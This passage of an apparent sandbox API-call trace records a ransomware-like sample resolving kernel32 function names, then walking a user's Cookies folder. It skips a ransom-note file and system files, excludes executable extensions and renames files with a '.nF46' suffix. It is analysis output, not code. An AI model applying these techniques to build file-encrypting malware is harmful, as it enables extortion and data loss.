lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.508] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.508] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.508] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.508] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.508] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.508] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.509] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.509] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.509] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.509] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.509] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.509] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.509] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.509] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.509] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.509] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.509] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.509] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.509] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.509] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.509] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.509] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.510] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.510] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.510] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.510] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.510] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.510] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.510] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.510] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.510] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.510] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.510] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.510] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.510] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.510] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.510] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.510] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.510] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.510] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.511] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.511] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.511] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.511] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.511] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.511] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.511] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.511] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.511] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.511] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.511] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.511] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.511] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.511] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.511] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.511] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.511] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.511] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.511] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.511] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.512] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.512] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.512] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.512] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.512] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.512] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.512] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.512] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.512] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.512] lstrlenA (lpString="DELETEATOM") returned 10 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.512] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.512] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.512] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.512] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.512] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.512] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.512] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.512] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.512] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.513] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.513] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.513] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.513] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.513] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.513] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.513] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.513] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.513] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.513] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.513] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.513] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.513] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.513] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.513] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.513] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.513] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.514] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.514] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.514] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.514] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.514] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.514] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.514] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.514] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.514] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.514] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.514] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.514] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.514] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.514] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.514] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.514] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.514] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.515] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.515] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned 113 [0079.515] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46") returned 118 [0079.515] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nf46"), dwFlags=0x0) returned 1 [0079.515] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.516] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.516] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.516] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b50050, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x50b50050, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x50b50050, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x337, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@msn[1].txt", cAlternateFileName="5PBFF9~1.TXT")) returned 1 [0079.516] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.516] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="autorun.inf") returned -1 [0079.516] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="boot.ini") returned -1 [0079.516] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="desktop.ini") returned -1 [0079.516] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="ntuser.dat") returned -1 [0079.516] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="iconcache.db") returned -1 [0079.516] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="bootsect.bak") returned -1 [0079.516] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="thumbs.db") returned -1 [0079.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="Bootfont.bin") returned -1 [0079.517] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@msn[1].txt") returned 31 [0079.517] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.517] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.517] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.517] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.517] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 